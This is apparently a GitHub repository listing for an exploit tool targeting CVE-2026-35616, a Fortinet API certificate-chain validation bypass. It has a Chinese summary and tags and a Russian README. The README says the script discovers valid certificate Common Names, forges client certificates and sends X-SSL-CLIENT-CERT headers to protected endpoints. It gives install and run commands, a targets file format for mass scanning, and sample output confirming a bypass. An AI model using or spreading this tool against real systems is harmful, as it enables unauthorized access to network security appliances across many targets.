wa6n3r/CVE-2026-35616
GitHub: wa6n3r/CVE-2026-35616
针对 Fortinet API 证书链校验漏洞的自动化利用脚本,伪造客户端证书以绕过信任验证。
Stars: 0 | Forks: 0
# CVE-2026-35616
## Описание
Эксплуатация уязвимости обхода проверки цепочки сертификатов в API Fortinet.
Скрипт автоматически обнаруживает допустимые Common Name (CN) из различных источников,
генерирует поддельный клиентский сертификат и выполняет запросы к защищённым эндпоинтам
с использованием заголовков `X-SSL-CLIENT-VERIFY` и `X-SSL-CLIENT-CERT`.
## Требования
- Python 3.8+
- Зависимости:
- `requests`
- `cryptography`
- `urllib3`
- Опционально: `openssl` (для расширенного обнаружения CA через TLS handshake)
## Установка
```
# Клонирование проекта
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# Установка зависимостей
pip install -r requirements.txt
## Использование
# Базовый запуск
python3 exploit.py
# С указанием цели и порта
python3 exploit.py [PORT]
# Примеры:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# Формат файла целей (targets.txt)
При массовом тестировании создайте файл targets.txt с одним целевым адресом на строку:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# Выходные файлы
При успешном выполнении скрипт создаёт:
results/bypass_results___.json — детальный отчёт в формате JSON с:
Использованным CN
Статусами ответов по каждому эндпоинту
Префиксами ответов для анализа
# Структура вывода
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 Target: https://192.168.1.100:443
[*] Discovering CA CNs from multiple sources...
[•] TLS CA CN: 'fortinet-ca2'
[•] ZTNA CA CN: 'support'
[*] Found 2 candidate CN(s): fortinet-ca2, support
[*] Testing 2 candidate CN(s) for bypass...
[+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED
[*] Probing all cert_chain endpoints with CN='support'...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json
```
标签:API安全, CN伪造, cryptography, CVE, Fortinet, HTTPS绕过, IP 地址批量处理, JSON报告, JSON输出, Python, Python 3.8, requests, SSL/TLS, StruQ, targets.txt, urllib3, X-SSL-CLIENT-CERT, X-SSL-CLIENT-VERIFY, 中间人攻击, 二进制发布, 客户端证书, 开源工具, 数字取证, 数字签名, 无后门, 日志解析, 目标发现, 结果输出, 自动化脚本, 证书伪造, 证书绕过, 证书链, 逆向工具